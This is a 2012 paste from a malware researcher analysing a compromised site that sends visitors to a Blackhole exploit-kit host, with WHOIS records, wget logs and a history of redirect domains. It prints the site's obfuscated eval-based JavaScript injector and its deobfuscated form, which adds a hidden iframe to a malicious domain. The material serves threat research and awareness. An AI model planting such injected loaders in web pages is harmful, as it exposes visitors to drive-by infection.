Advertisement
unixfreaxjp

#Blackhole Infector pairs 173.236.136.84 and 67.208.74.71

Oct 3rd, 2012
99
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /*==========================================
  2. Blackhole server infector monitor analysis..
  3. Detected from: 2012-09-27
  4. Recorded to : 2012-10-03
  5. Research of #MalwareMustDie
  6. - we don't steal, we seek by our own resource,
  7. we expose, to raise malware awareness, not to mess other's work
  8. we share, to all malware victims, to end the blindness of malware victimization
  9. whose are fooled by many security protection craps..
  10. this is at least a good deed in our limited/short internet uptimes
  11. Researched by @unixfreaxjp
  12. Oct 3rd, 23:31 GMT+9
  13. ==========================================*/
  14.  
  15. // This blackhole servers one is infector actively infect via various spams
  16. // linked url lead to 173.236.136.84, while in 173.236.136.84 people are
  17. // redirected to another evil host: 67.208.74.71 of which hacing a long
  18. // history trace in blackhole infections..
  19. //
  20. // The actors is so clever to play hide and seek with us,
  21. // what we expose is what we monitor in the past days,
  22. // I hope authorities in US can do something to nail these
  23. // infectors scheme, by intercept these hosts' activity to get to
  24. // link to the actors.
  25. //
  26. // #MalwareMustDie!
  27.  
  28.  
  29. // Infector background
  30.  
  31. IP: 173.236.136.84 / Host: www.teamrainert.com
  32.  
  33. NetRange: 173.236.128.0 - 173.236.255.255
  34. CIDR: 173.236.128.0/17
  35. OriginAS: AS26347
  36. NetName: DREAMHOST-BLK10
  37. NetHandle: NET-173-236-128-0-1
  38. Parent: NET-173-0-0-0-0
  39. NetType: Direct Allocation
  40. RegDate: 2010-03-30
  41. Updated: 2012-03-02
  42. Ref: http://whois.arin.net/rest/net/NET-173-236-128-0-1
  43.  
  44. OrgName: New Dream Network, LLC
  45. OrgId: NDN
  46. Address: 417 Associated Rd.
  47. Address: PMB #257
  48. City: Brea
  49. StateProv: CA
  50. PostalCode: 92821
  51. Country: US
  52. RegDate: 2001-04-17
  53. Updated: 2012-09-27
  54. Ref: http://whois.arin.net/rest/org/NDN
  55.  
  56. //----------------------------------------------------------------------------
  57.  
  58. // Infector history (source spamdb/blacklists)
  59.  
  60. 2012-09-27 06:41:09 http://teamrainert.com/2010/12/28/top-13-baby-products-from-zero-to-four-months/
  61. 2012-09-27 06:41:10 http://www.teamrainert.com/2010/12/28/top-13-baby-products-from-zero-to-four-months/
  62. 2012-09-27 14:49:08 http://teamrainert.com/2010/12/28/top-13-baby-products-from-zero-to-four-months
  63. 2012-09-29 02:31:44 http://www.teamrainert.com/?cat=
  64. 2012-10-01 13:53:37 http://www.teamrainert.com/
  65. 2012-10-01 21:28:35 http://teamrainert.com/?cat=
  66.  
  67. //--------------------------------------------------------------------------
  68.  
  69. // One shot to kill...
  70.  
  71. --21:59:58-- http://www.teamrainert.com/
  72. => `index.html'
  73. Resolving www.teamrainert.com... 173.236.136.84
  74. Connecting to www.teamrainert.com|173.236.136.84|:80... connected.
  75. HTTP request sent, awaiting response... 200 OK
  76. Length: 46,621 (46K) [text/html]
  77. 100%[====================================>] 46,621 9.71K/s ETA 00:00
  78. 22:00:04 (9.70 KB/s) - `index.html' saved [46621/46621]
  79.  
  80. //-------------------------------------------------------------------------
  81.  
  82. // detection alerts...
  83.  
  84. [2012-10-03 22:08:14] [HTTP] URL: http://www.teamrainert.com/ (Status: 200, Referrer: None)
  85. [2012-10-03 22:08:17] [Window] Eval argument length > 64 (812)
  86.  
  87. //-------------------------------------------------------------------------
  88.  
  89. // evilcode found...
  90.  
  91. <script>h=-parseInt('012')/5;if(window.document)try{Boolean(true).prototype.a}catch(qqq){st=String;zz='al';zz='zv'.substr(1)+zz;ss=[];if(1){f='fromCh';f+='arC';f+='qgode'["substr"](2);}w=this;e=w[f.substr(11)+zz];t='y';} n="3.5!3.5!51.5!50!15!19!49!54.5!48.5!57.5!53.5!49.5!54!57!22!50.5!49.5!57!33.5!53!49.5!53.5!49.5!54!57!56.5!32!59.5!41!47.5!50.5!38!47.5!53.5!49.5!19!18.5!48!54.5!49!59.5!18.5!19.5!44.5!23!45.5!19.5!60.5!5.5!3.5!3.5!3.5!51.5!50!56!47.5!53.5!49.5!56!19!19.5!28.5!5.5!3.5!3.5!61.5!15!49.5!53!56.5!49.5!15!60.5!5.5!3.5!3.5!3.5!49!54.5!48.5!57.5!53.5!49.5!54!57!22!58.5!56!51.5!57!49.5!19!16!29!51.5!50!56!47.5!53.5!49.5!15!56.5!56!48.5!29.5!18.5!51!57!57!55!28!22.5!22.5!51!52!52.5!53!53!53!53!51!51!50.5!50.5!50.5!50.5!50!50!50!58!58!48!48!48!54!22!50!51.5!54!49!51!49.5!56!49.5!22!54.5!56!50.5!22.5!30.5!50.5!54.5!29.5!24!18.5!15!58.5!51.5!49!57!51!29.5!18.5!23.5!23!18.5!15!51!49.5!51.5!50.5!51!57!29.5!18.5!23.5!23!18.5!15!56.5!57!59.5!53!49.5!29.5!18.5!58!51.5!56.5!51.5!48!51.5!53!51.5!57!59.5!28!51!51.5!49!49!49.5!54!28.5!55!54.5!56.5!51.5!57!51.5!54.5!54!28!47.5!48!56.5!54.5!53!57.5!57!49.5!28.5!53!49.5!50!57!28!23!28.5!57!54.5!55!28!23!28.5!18.5!30!29!22.5!51.5!50!56!47.5!53.5!49.5!30!16!19.5!28.5!5.5!3.5!3.5!61.5!5.5!3.5!3.5!50!57.5!54!48.5!57!51.5!54.5!54!15!51.5!50!56!47.5!53.5!49.5!56!19!19.5!60.5!5.5!3.5!3.5!3.5!58!47.5!56!15!50!15!29.5!15!49!54.5!48.5!57.5!53.5!49.5!54!57!22!48.5!56!49.5!47.5!57!49.5!33.5!53!49.5!53.5!49.5!54!57!19!18.5!51.5!50!56!47.5!53.5!49.5!18.5!19.5!28.5!50!22!56.5!49.5!57!31.5!57!57!56!51.5!48!57.5!57!49.5!19!18.5!56.5!56!48.5!18.5!21!18.5!51!57!57!55!28!22.5!22.5!51!52!52.5!53!53!53!53!51!51!50.5!50.5!50.5!50.5!50!50!50!58!58!48!48!48!54!22!50!51.5!54!49!51!49.5!56!49.5!22!54.5!56!50.5!22.5!30.5!50.5!54.5!29.5!24!18.5!19.5!28.5!50!22!56.5!57!59.5!53!49.5!22!58!51.5!56.5!51.5!48!51.5!53!51.5!57!59.5!29.5!18.5!51!51.5!49!49!49.5!54!18.5!28.5!50!22!56.5!57!59.5!53!49.5!22!55!54.5!56.5!51.5!57!51.5!54.5!54!29.5!18.5!47.5!48!56.5!54.5!53!57.5!57!49.5!18.5!28.5!50!22!56.5!57!59.5!53!49.5!22!53!49.5!50!57!29.5!18.5!23!18.5!28.5!50!22!56.5!57!59.5!53!49.5!22!57!54.5!55!29.5!18.5!23!18.5!28.5!50!22!56.5!49.5!57!31.5!57!57!56!51.5!48!57.5!57!49.5!19!18.5!58.5!51.5!49!57!51!18.5!21!18.5!23.5!23!18.5!19.5!28.5!50!22!56.5!49.5!57!31.5!57!57!56!51.5!48!57.5!57!49.5!19!18.5!51!49.5!51.5!50.5!51!57!18.5!21!18.5!23.5!23!18.5!19.5!28.5!5.5!3.5!3.5!3.5!49!54.5!48.5!57.5!53.5!49.5!54!57!22!50.5!49.5!57!33.5!53!49.5!53.5!49.5!54!57!56.5!32!59.5!41!47.5!50.5!38!47.5!53.5!49.5!19!18.5!48!54.5!49!59.5!18.5!19.5!44.5!23!45.5!22!47.5!55!55!49.5!54!49!32.5!51!51.5!53!49!19!50!19.5!28.5!5.5!3.5!3.5!61.5"["split"]("a!".substr(1));for(i=6-2-1-2-1;i!=605;i++){j=i;if(st)ss=ss+st[f](-h*(1+1*n[j]));}if(zz)q=ss;if(t)e(""+q);</script>
  92.  
  93. //-------------------------------------------------------------------------
  94.  
  95. // deobfs step 1 of evil code...
  96.  
  97. if (document.getElementsByTagName('body')[0]){
  98. iframer();
  99. }
  100. else {
  101. document.write("
  102. <iframe src='http://hjkllllhhggggfffvvbbbn.findhere.org/?go=2'
  103. width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'>
  104. </iframe>");
  105. }
  106. function iframer(){
  107. var f = document.createElement('iframe');
  108. f.setAttribute('src', 'http://hjkllllhhggggfffvvbbbn.findhere.org/?go=2');
  109. f.style.visibility = 'hidden';
  110. f.style.position = 'absolute';
  111. f.style.left = '0';
  112. f.style.top = '0';
  113. f.setAttribute('width', '10');
  114. f.setAttribute('height', '10');
  115. document.getElementsByTagName('body')[0].appendChild(f);
  116.  
  117. //-------------------------------------------------------------------------
  118.  
  119. // 2nd deobfs evil code.. evil iframe came up..
  120.  
  121. <iframe src='http://hjkllllhhggggfffvvbbbn.findhere.org/?go=2'
  122. width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'>
  123. </iframe>
  124.  
  125. //-------------------------------------------------------------------------
  126.  
  127. // fetch config , settings: 3 modes, w/o tor, tor, "gatling fethcing gun"
  128.  
  129. user-agent="Mozilla/5.0 (X11; U; NetBSD"
  130. referer="http://www.teamrainert.com/"
  131. target="http://hjkllllhhggggfffvvbbbn.findhere.org/?go=2"
  132.  
  133. // without tor
  134.  
  135. --22:29:04-- http://hjkllllhhggggfffvvbbbn.findhere.org/?go=2
  136. => `index.html@go=2'
  137. Resolving hjkllllhhggggfffvvbbbn.findhere.org... 67.208.74.71
  138. Connecting to hjkllllhhggggfffvvbbbn.findhere.org|67.208.74.71|:80... connected.
  139.  
  140. HTTP request sent, awaiting response... 301 Moved Permanently
  141. Location: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?hjkllllhhggggfffvvbbbn.findhere.org [following]
  142. --22:29:05-- http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?hjkllllhhggggfffvvbbbn.findhere.org
  143. => `redir_not_found.shtml@hjkllllhhggggfffvvbbbn.findhere.org.1'
  144. Resolving domainpark.sitelutions.com... 67.208.74.12
  145. Connecting to domainpark.sitelutions.com|67.208.74.12|:80... connected.
  146. HTTP request sent, awaiting response... 200 OK
  147. Length: unspecified [text/html]
  148. 22:29:06 (57.20 MB/s) - `redir_not_found.shtml@hjkllllhhggggfffvvbbbn.findhere.org.1' saved [5680]
  149.  
  150. // with tor
  151.  
  152. --2012-10-03 22:33:17-- http://hjkllllhhggggfffvvbbbn.findhere.org/?go=2
  153. Resolving localhost (localhost)... 127.0.0.1, ::1
  154. Connecting to localhost (localhost)|127.0.0.1|:8118... connected.
  155. Proxy request sent, awaiting response... 301 Moved Permanently
  156. Location: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?hjkllllhhggggfffvvbbbn.findhere.org [following]
  157. --2012-10-03 22:33:18-- http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?hjkllllhhggggfffvvbbbn.findhere.org
  158. Connecting to localhost (localhost)|127.0.0.1|:8118... connected.
  159. Proxy request sent, awaiting response... 200 OK
  160. Length: unspecified [text/html]
  161. Saving to: `index.html?go=2'
  162. 2012-10-03 22:33:20 (30.4 KB/s) - `index.html?go=2' saved [5680]
  163.  
  164. // gatling "fetching" gun
  165.  
  166. --22:36:00-- http://hjkllllhhggggfffvvbbbn.findhere.org/?go=2
  167. => `index.html?go=2'
  168. Resolving hjkllllhhggggfffvvbbbn.findhere.org... 67.208.74.71
  169. Connecting to hjkllllhhggggfffvvbbbn.findhere.org|67.208.74.71|:80... connected.
  170. HTTP request sent, awaiting response... 301 Moved Permanently
  171. Location: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?hjkllllhhggggfffvvbbbn.findhere.org [following]
  172. --22:36:01-- http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?hjkllllhhggggfffvvbbbn.findhere.org
  173. => `redir_not_found.shtml?hjkllllhhggggfffvvbbbn.findhere.org'
  174. Resolving domainpark.sitelutions.com... 67.208.74.12
  175. Connecting to domainpark.sitelutions.com|67.208.74.12|:80... connected.
  176. HTTP request sent, awaiting response... 200 OK
  177. Length: unspecified [text/html]
  178. 22:36:02 (25.03 KB/s) - `redir_not_found.shtml?hjkllllhhggggfffvvbbbn.findhere.org' saved [5680]
  179.  
  180.  
  181. // --lynx snips----
  182.  
  183. Redirection Not Found hjkllllhhggggfffvvbbbn.findhere.org
  184.  
  185. The website hjkllllhhggggfffvvbbbn.findhere.org is (or was) utilizing the Sitelutions Redirection Engine.
  186. Unfortunately, the URL has been entered incorrectly, or
  187. the site has been deleted by its owner. Below are some of our other services and features that we offer.
  188.  
  189. //----------------------------------------------------
  190.  
  191. // alternative infector urls...
  192.  
  193. --2012-10-03 22:57:27-- http://teamrainert.com/?cat=
  194. Resolving localhost (localhost)... 127.0.0.1, ::1
  195. Connecting to localhost (localhost)|127.0.0.1|:8118... connected.
  196. Proxy request sent, awaiting response... 301 Moved Permanently
  197. Location: http://www.teamrainert.com/?cat= [following]
  198. --2012-10-03 22:57:29-- http://www.teamrainert.com/?cat=
  199. Connecting to localhost (localhost)|127.0.0.1|:8118... connected.
  200. Proxy request sent, awaiting response... 301 Moved Permanently
  201. Location: http://www.teamrainert.com/ [following]
  202. --2012-10-03 22:57:31-- http://www.teamrainert.com/
  203. Connecting to localhost (localhost)|127.0.0.1|:8118... connected.
  204. Proxy request sent, awaiting response... 200 OK
  205. Length: 43829 (43K) [text/html]
  206. Saving to: `index.html?cat='
  207. 100%[========>] 43,829 30.0K/s in 1.4s
  208. 2012-10-03 22:57:35 (30.0 KB/s) - `index.html?cat=' saved [43829/43829] <--- same page as pr above lynx snipped
  209.  
  210. //result...
  211. currently CLEAN Site... at least FOR NOW, and so other urls too...
  212.  
  213.  
  214. //-----------------------------------------------------------------
  215.  
  216. The history of reported cases of redir target host: 67.208.74.71
  217.  
  218. 2012-10-01 17:29:21 http://olpqqvuwlb.ontheweb.nu/?go=2
  219. 2012-09-30 04:02:02 http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775
  220. 2012-09-30 03:02:02 http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775
  221. 2012-09-30 02:58:34 http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775
  222. 2012-09-29 19:48:00 http://epafyszpyfoc.lookin.at
  223. 2012-09-25 22:02:02 http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775
  224. 2012-09-25 21:02:10 http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775
  225. 2012-09-25 20:02:02 http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775
  226. 2012-09-24 17:51:57 http://svglxngnnwmm.rr.nu
  227. 2012-09-23 20:02:05 http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775
  228. 2012-09-23 20:02:05 http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775
  229. 2012-09-23 19:02:03 http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775
  230. 2012-09-23 19:02:02 http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775
  231. 2012-09-22 22:02:04 http://scielethktt.byinter.net/main.php?page=c9ee61ed42809775
  232. 2012-09-22 21:02:23 http://scielethktt.byinter.net/main.php?page=c9ee61ed42809775
  233. 2012-09-22 20:02:04 http://scielethktt.byinter.net/main.php?page=c9ee61ed42809775
  234. 2012-09-22 19:02:03 http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775
  235. 2012-09-22 18:02:03 http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775
  236. 2012-09-22 17:02:01 http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775
  237. 2012-09-21 01:02:03 http://tpwwdgyqwse.byinter.net/main.php?page=c9ee61ed42809775
  238. 2012-09-21 00:02:25 http://tpwwdgyqwse.byinter.net/main.php?page=c9ee61ed42809775
  239. 2012-09-20 23:02:03 http://tpwwdgyqwse.byinter.net/main.php?page=c9ee61ed42809775
  240. 2012-09-17 20:02:03 http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775
  241. 2012-09-17 19:02:10 http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775
  242. 2012-09-17 18:02:04 http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775
  243. 2012-09-16 19:02:07 http://sikxiqvsek.kwik.to/main.php?page=c9ee61ed42809775
  244. 2012-09-16 18:02:03 http://jvicuyqfunoj.ontheweb.nu/main.php?page=c9ee61ed42809775
  245. 2012-09-16 17:02:08 http://jvicuyqfunoj.ontheweb.nu/main.php?page=c9ee61ed42809775
  246. 2012-09-16 16:02:02 http://jvicuyqfunoj.ontheweb.nu/main.php?page=c9ee61ed42809775
  247. 2012-09-16 12:44:40 http://67.208.74.71
  248. 2012-09-15 21:02:04 http://sikxiqvsek.kwik.to/main.php?page=c9ee61ed42809775
  249. 2012-09-15 20:02:08 http://sikxiqvsek.kwik.to/main.php?page=c9ee61ed42809775
  250. 2012-09-15 20:02:05 http://qzbeakfwyvqf.byinter.net/main.php?page=c9ee61ed42809775
  251. 2012-09-15 19:02:13 http://qzbeakfwyvqf.byinter.net/main.php?page=c9ee61ed42809775
  252. 2012-09-15 19:02:05 http://sikxiqvsek.kwik.to/main.php?page=c9ee61ed42809775
  253. 2012-09-15 18:02:03 http://qzbeakfwyvqf.byinter.net/main.php?page=c9ee61ed42809775
  254. 2012-09-15 16:02:06 http://gcykrglro.ontheweb.nu/main.php?page=c9ee61ed42809775
  255. 2012-09-15 15:02:29 http://gcykrglro.ontheweb.nu/main.php?page=c9ee61ed42809775
  256. 2012-09-15 14:02:02 http://gcykrglro.ontheweb.nu/main.php?page=c9ee61ed42809775
  257. 2012-09-14 20:02:22 http://jvicuyqfunoj.ontheweb.nu/main.php?page=c9ee61ed42809775
  258. 2012-09-14 19:02:11 http://jvicuyqfunoj.ontheweb.nu/main.php?page=c9ee61ed42809775
  259. 2012-09-14 18:02:02 http://jvicuyqfunoj.ontheweb.nu/main.php?page=c9ee61ed42809775
  260. 2012-09-14 16:56:54 http://lookin.at
  261. 2012-09-14 16:32:29 http://rr.nu
  262. 2012-09-13 19:16:50 http://satsudtowpco.rr.nu
  263. 2012-09-13 15:02:06 http://jtohmesaao.ontheweb.nu/main.php?page=c9ee61ed42809775
  264. 2012-09-13 15:02:05 http://jvicuyqfunoj.ontheweb.nu/main.php?page=c9ee61ed42809775
  265. 2012-09-13 14:02:12 http://jvicuyqfunoj.ontheweb.nu/main.php?page=c9ee61ed42809775
  266. 2012-09-13 14:02:12 http://jtohmesaao.ontheweb.nu/main.php?page=c9ee61ed42809775
  267. 2012-09-13 13:02:04 http://jtohmesaao.ontheweb.nu/main.php?page=c9ee61ed42809775
  268.  
  269. //----------------------------------------------------------------
  270.  
  271. // I picked one: http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775
  272. // Settings: Adobe Reader: 8.0, Java: 1.6_10
  273.  
  274. --2012-10-03 23:14:18-- http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775
  275. Resolving localhost (localhost)... 127.0.0.1, ::1
  276. Connecting to localhost (localhost)|127.0.0.1|:8118... connected.
  277. Proxy request sent, awaiting response... 301 Moved Permanently
  278. Location: http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?koqjhmmhcm.byinter.net [following]
  279. --2012-10-03 23:14:20-- http://domainpark.sitelutions.com/redir_not_found/redir_not_found.shtml?koqjhmmhcm.byinter.net
  280. Connecting to localhost (localhost)|127.0.0.1|:8118... connected.
  281. Proxy request sent, awaiting response... 200 OK
  282. Length: unspecified [text/html]
  283. Saving to: `main.php?page=c9ee61ed42809775'
  284. 2012-10-03 23:14:22 (12.8 KB/s) - `main.php?page=c9ee61ed42809775' saved [5654]
  285.  
  286. // Found zips.. except the link to the google commrcial...
  287.  
  288. <!doctype html>
  289. <html>
  290.  
  291. <body>
  292. <script>
  293. google_ad_channel = "";
  294. google_ad_client = "pub-2844624690808284";
  295. google_ad_format = "728x90_as";
  296. google_ad_height = 90;
  297. google_ad_type = "text_image";
  298. google_ad_width = 728;
  299. google_color_bg = "FFFFFF";
  300. google_color_border = "FFFFFF";
  301. google_color_link = "0000FF";
  302. google_color_text = "000000";
  303. google_color_url = "008000";
  304. google_show_ads_impl = true;
  305. google_unique_id = 1;
  306. google_async_iframe_id = "aswift_0";
  307. google_start_time = 1348970528339;
  308. google_expand_experiment = "none";
  309. google_bpp = 8;
  310. </script>
  311. <script src="http://pagead2.googlesyndication.com/pagead/js/r20120919/r20120730/show_ads_impl.js">
  312. </script>
  313. </body>
  314.  
  315. </html>
  316.  
  317. //----------------------------------------
  318.  
  319. // while WHOIS showed...
  320.  
  321. IP: 67.208.74.71
  322.  
  323. InfoRelay Online Systems, Inc. INFORELAY-NETBLOCK01 (NET-67-208-64-0-1) 67.208.64.0 - 67.208.95.255
  324. InfoRelay Online Systems, Inc. INFORELAY-LBSERVERS-02 (NET-67-208-74-64-1) 67.208.74.64 - 67.208.74.95
  325.  
  326. Routings...
  327.  
  328. ASN | Prefix | ASName | CN | Domain | ISP of an IP Address
  329. 33597 | 67.208.74.0/23 | INFORELAY | US | INFORELAY.NET | INFORELAY ONLINE SYSTEMS INC.
  330.  
  331. //------ end of analysis ------
  332.  
  333. #MalwareMustDie!
Advertisement
RAW Paste Data Copied
Advertisement